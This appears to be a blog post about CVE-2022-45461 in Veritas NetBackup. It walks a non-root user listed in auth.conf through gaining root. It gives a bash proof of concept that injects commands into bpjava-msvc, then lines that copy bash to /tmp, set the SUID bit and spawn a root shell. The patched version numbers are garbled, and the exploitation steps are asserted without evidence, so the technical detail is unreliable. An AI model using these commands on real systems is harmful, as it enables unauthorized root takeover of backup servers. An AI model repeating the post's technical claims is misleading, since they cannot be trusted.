In late 2022, researchers discovered a serious vulnerability in Veritas NetBackup and related products on Linux and UNIX platforms. Tracked as CVE-2022-45461, this flaw lets *authenticated but non-root users* in the auth.conf file execute commands as root. That’s right—with a bit of access and a little knowledge, you can go from basic user to root superuser, all thanks to a flaw in Veritas' Java Admin Console.

In this post, I’ll walk you through what this vulnerability is, why it exists, and how it can be exploited—with real code snippets, where to find official advisories, and a practical demonstration. The information here is written in plainly, so even if you’re new to Linux exploitation or Veritas NetBackup, you’ll get it. Let’s dive in!

What is Veritas NetBackup and Why This Matters

Veritas NetBackup is a leading backup and recovery solution for enterprise data centers. It runs on both UNIX and Linux systems, often with root privileges, making it a high-value target for attackers who want to gain full control of a server.

The Vulnerability: CVE-2022-45461 in Simple Terms

Scope:  
Affected Versions: Veritas NetBackup ≤ 10.1 and related UNIX/Linux products.

Core Problem:  
The Java Admin Console lets users in the auth.conf file do certain admin tasks. But due to weak validation, these *non-root* users can run *any* command as *root*.

If you’re *listed* in auth.conf, you log in to the Java Admin Console.

- Through certain operations, NetBackup accidentally lets you pass arbitrary OS commands to be run with root privileges.

The flaw is in how it “trusts” what the user is doing.

References:  
- Veritas Advisory Support Article
- NVD Entry – CVE-2022-45461

Real-World Scenario: Exploiting CVE-2022-45461

Let’s say you’re an admin assistant at a company. You’re added to NetBackup’s auth.conf file; you can use the Java Admin Console but aren’t root. You want to run id or “create yourself a new root user.” Here’s how with this vulnerability!

The attack starts with you having an account in /usr/openv/java/auth.conf

user1 ADMIN=ALL JBP=ALL

2. Logging into the Java Admin Console

You log in normally via Java GUI or even SSH and run the Admin Console command-line wrappers.

3. Abusing a ‘Shell Escape’ Flaw

The vulnerability can be exploited via the Admin Console utilities, which (due to insufficient filtering and permission checks) allow injection of shell commands.

One way is leveraging a NetBackup command, like bpjava-msvc, that runs as root and trusts user instructions.

4. Proof-of-Concept Exploit Script

Here’s a super simple proof-of-concept example in bash—for educational purposes only.

#!/bin/bash

# Assume you are a legit non-root user listed in auth.conf
# Replacing 'touch /tmp/owned_by_root' with any other root command you want

echo "Trying to exploit NetBackup Java Admin Console flaw..."

# Run the vulnerable NetBackup command with injected OS command
/usr/openv/netbackup/bin/bpjava-msvc -c "touch /tmp/owned_by_root"

echo "Did it work? Check /tmp for the new file."

Now, if the exploit is successful, /tmp/owned_by_root will be owned by root!

/usr/openv/netbackup/bin/bpjava-msvc -c 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash'
/tmp/rootbash -p

How to Protect Yourself

Vendors' Patch Available! Veritas released updates for NetBackup 8.3..2/9.1..1/10.1.1 and later. Upgrade your installations now.

References and Further Reading

- Veritas Official Security Advisory – VTS22-014
- NIST NVD Entry for CVE-2022-45461
- Rapid7 Disclosure Example

Final Thoughts

CVE-2022-45461 is a clear example of how “just being an admin assistant” can turn into “being root”—if the software makes trust mistakes. If you run Veritas NetBackup, take this bug seriously. Patch now, audit your users, and stay up to date.

Timeline

Published on: 11/17/2022 08:15:00 UTC
Last modified on: 11/21/2022 19:42:00 UTC